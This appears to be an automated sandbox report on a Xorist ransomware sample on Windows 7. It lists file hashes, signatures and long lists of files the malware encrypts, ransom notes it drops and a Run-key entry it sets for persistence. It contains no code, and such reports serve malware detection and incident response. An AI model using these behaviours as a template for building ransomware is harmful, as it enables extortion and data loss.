SHA256 45e39dadd592dd9a876282b754f6d30f47b863ebdaeb631b8229fead59cfbce6
SHA512 a52ed5fa15e14d33dcff8041f469e01af5bdefefba9bbbdc7cfa8f43575bd99351bba90f9ba610b382635bb3ce01464c89a32f06a720d65d195a060adc9ec5e6

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\selectedTab_leftCorner.gif.jaff

MD5 188b6fa25b8b362a7c622737e04af95c
SHA1 631ffc66ca28bdf719b7fff06aabfffb95346b81
SHA256 f13dbcfb41875c953edac474d7311e5ac7ceb078db29cb85c1b700d633056351
SHA512 3df9cf103b5aabac0db31eec0200224d364cc6de9befa0515fe4e2f11d17f6c77c584dbb8f7e2f5c802f0a98988549a2440dba6855d88829b515b864f3aff7fb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\000006.log.jaff

MD5 cb0caa7a31faad958e1336f27bba6500
SHA1 d60eae58767222d839963ebb869f7b222b547c28
SHA256 32ef903dbfbe32450ce7ff64aa143fb397ffab67bc230740f71f9ceb13c41cec
SHA512 2047eb41b0ae5d321ff3ac5c901193f6c2f96296ffcadb2d40aa6eb17cba688fa95727386e2b9dada6a10943c40d0f3440d84202c2d908905c4638a3a0c6ef88

C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\invalid32x32.gif.jaff

MD5 1cbe2e58157a22882cb05e3f88c48bb6
SHA1 f842aef3198367b7cd52e3ee91508e5bfbbfc49c
SHA256 3a0033dabc65867d7ce2853951e9e4b01a705453b8afe7b06e63fe3ec91e7392
SHA512 96212f5927fcc5916d1d0a085fed350300def7a816a48befc9dcb015a7c8b5fb36e6c21c1596820a01d83e2f9296611d32815985af2d67b3f4501ceb3a506358

C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\epl-v10.html.jaff

MD5 f82fc43f5af424cb3ef4db466e16326d
SHA1 742b20773687eec8a9280d17781a5404ac1ec4d8
SHA256 691762dc8c26b0390d1446bb36c01ac011b65248d94e8bb457baadfdd040efb0
SHA512 8d35595bf678e1d1348792c9f72983b94ceeb97c55c3c1981f36d91b579d51cc6630e18289e7fa651f9057de5972269bb6833b6186770544a8f837135ebb8823

C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\license.html.jaff

MD5 e1dd2c95265f33c04b153699fb25260e
SHA1 9336b504a5fb20a0e2d41703261e54e62fc81ba0
SHA256 a58317f522f073a2b45e079445544e36055cf326466991208df4db8bf0d4a94f
SHA512 68b4f85387fd914eede17b27baecd3c84acb1cfc4115dc995356ab48b978c514b0ee84ad359ed2ceff1b4225235de25b244214febf195d8498ff3f9752c3bdd6

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\BUTTON.GIF.jaff

MD5 2352c1e232f2d1937e2fc3e644de24f8
SHA1 5ca092a056e1170afd94c244cf89461faa7ba548
SHA256 5857a28d90dfb5d07597b0aa336512d474459ede117b82fc7fddb459e852edec
SHA512 d88638c77024a99a386a9d8ce75d80613f077d91ef2356be8257047ad40872e8e45bb80f2844efd02b0b3556c06180b328278631a0592fd9d8dee4a5029c3cc6

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_OFF.GIF.jaff

MD5 b8885404aed05928f9c493470fdb95f0
SHA1 22c3442a540a57e5772953a64a3deeb2bbee3535
SHA256 38abd0d4d00329468b3dd182685ec0dc9e12c55a3eeb18dcee528669cd0e284e
SHA512 34be47cfd9f22bb63fd0696d1ce3d79aabb273f884454c6e85d57fc91b68a34d85100d35d8d80ea70cd61217fdc4a226627e8c209525baf2c91f9461be61291f

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\TAB_ON.GIF.jaff

MD5 a16200564cdcb588ca540f93a53a7dc1
SHA1 53cdea292ef0db1305bbdeb74c6568b3986bdffa
SHA256 c59bba269d2169380b5076250cdbdb576d73cf7a5964bcf86b06351d80ab42f8
SHA512 9b40aa6bb4b9f8c9da1279e91d575b474da881cbd724f3e80e6d7e3a2bbddbb876d304e2a7f0a8a1de0bf6535c3b7404e9cc1d6af487133cdba3fa0517144594

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite.jaff

MD5 1a42d75f6972f0eb5903096f7b297c9b
SHA1 1ee4d288ac113a37881be956012751dc86243489
SHA256 417a5e929c97bf9732b39ac798532cea07ccb84fb136e07fcce45638317249de
SHA512 967d0dadad75d364da8334b297a21c16c8e63a468ef9b1bd0b57e0a123b531961157cbdb90b962b6f6dbe219a82ff36e15202d7a441948040ef195b03c088f0e

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:11

Platform

win7-20240903-en

Max time kernel

58s

Max time network

59s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe"

Signatures

Detected Xorist Ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Xorist Ransomware

ransomware xorist

Xorist family

xorist

Renames multiple (2558) files with added filename extension

ransomware

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\drivers\ja-JP\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\drivers\de-DE\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\drivers\en-US\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\drivers\es-ES\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\drivers\fr-FR\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\drivers\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\gmreadme.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\drivers\it-IT\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Alcmeter = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Bdx48saERp3j6l1.exe" C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\InfDefaultInstall.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_try_catch_finally.help.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmdsi.inf_amd64_neutral_e77f438012239042\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmusrk1.inf_amd64_neutral_19cdebd3e1182874\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\Dism\fr-FR\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wudfusbcciddriver.inf_amd64_neutral_adc3e4acb1046b4b\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\ko-KR\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\migwiz\es-ES\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\shutdown.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\lsi_sas2.inf_amd64_neutral_e12a5c4cfbe49204\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\usbprint.inf_amd64_neutral_54948be2bc4bcdd1\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_debuggers.help.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_parameters.help.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\ph6xib64c0.inf_amd64_neutral_a43df8f7441e1c61\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnep002.inf_amd64_neutral_efc4a7485b172c07\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wiaep003.inf_amd64_neutral_c2a98813147bf34e\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_locations.help.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\_Default\UltimateN\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_type_operators.help.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\ar-SA\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\eval\Starter\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmiodat.inf_amd64_neutral_839e9ee1a8736613\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmlasat.inf_amd64_neutral_bc1469ba40fe2114\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wialx005.inf_amd64_neutral_5304c93e2193f237\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\OEM\StarterE\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\zh-CN\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\rekeywiz.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_remote_jobs.help.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\brmfcmdm.inf_amd64_neutral_af49d2f3ffa12116\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\esentutl.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\_Default\Starter\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\migwiz\replacementmanifests\WindowsSearchEngine\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_Assignment_Operators.help.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmzyxel.inf_amd64_neutral_ed1f16b3d0cae908\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_neutral_4616c3de1949be6d\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnbr003.inf_amd64_neutral_dff45d1d0df04caf\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wdmaudio.inf_amd64_neutral_423894ded0ba8fdf\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wiahp001.inf_amd64_neutral_aee49cdf3b352e58\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmnokia.inf_amd64_neutral_a8e9a41983d33a0b\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\ph3xibc11.inf_amd64_neutral_bb18e5f134c40c68\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\eval\EnterpriseN\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\_Default\ProfessionalN\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\dllhost.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\angelu64.inf_amd64_neutral_3d6079dd78127f5e\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\pt-PT\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmaiwa4.inf_amd64_neutral_6e97842bb8d9e6a8\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmbtmdm.inf_amd64_neutral_2e4da8629fc5904e\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnky308.inf_amd64_ja-jp_d90af802b607044a\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\transfercable.inf_amd64_neutral_82f4c743c8996d67\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\windowssideshowenhanceddriver.inf_amd64_neutral_184a2ef2a8f57c33\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\OEM\Professional\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\OEM\ProfessionalN\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnbr004.inf_amd64_neutral_a78e168d6944619a\Amd64\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\ipconfig.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_script_internationalization.help.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\eval\HomePremium\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\averfx2swtv_x64.inf_amd64_neutral_24a71cdaabc7f783\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\_Default\StarterE\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_try_catch_finally.help.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\circlass.inf_amd64_neutral_cf52485bed804e02\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\Recovery\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\atiriol6.inf_amd64_neutral_bde34ad5722cca75\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\disk.inf_amd64_neutral_10ce25bbc5a9cc43\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\tsprint.inf_amd64_neutral_c48d421ad2c1e3e3\amd64\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ncihmbejmpladfin.bmp" C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_h.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\flyout.html C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\js\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_disabled.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\fr-FR\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\Help\1033\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341645.JPG C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_dot.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01750_.GIF C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmiregistry.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Windows Mail\WinMail.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_partly-cloudy.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ECLIPSE\THMBNAIL.PNG C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\icon.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21390_.GIF C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10308_.GIF C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\fr-FR\css\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Trans_Scene_PAL.wmv C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files\Windows Journal\Templates\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Windows Mail\wabmig.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10289_.GIF C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodbig.gif C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files\Windows Mail\es-ES\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataListIconImagesMask.bmp C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonSubpicture.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\2.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\6.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_Groove.gif C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\http\requests\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\ja-JP\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Stucco.gif C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files\Microsoft Games\Multiplayer\Checkers\ja-JP\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\45.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02077_.GIF C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmap.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\HEADER.GIF C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\background.gif C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsMacroTemplate.html C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\MSBuild\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-image-inset.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files\Microsoft Games\Multiplayer\Checkers\en-US\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21421_.GIF C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Lime\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_settings.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Slate\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\title_stripe.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
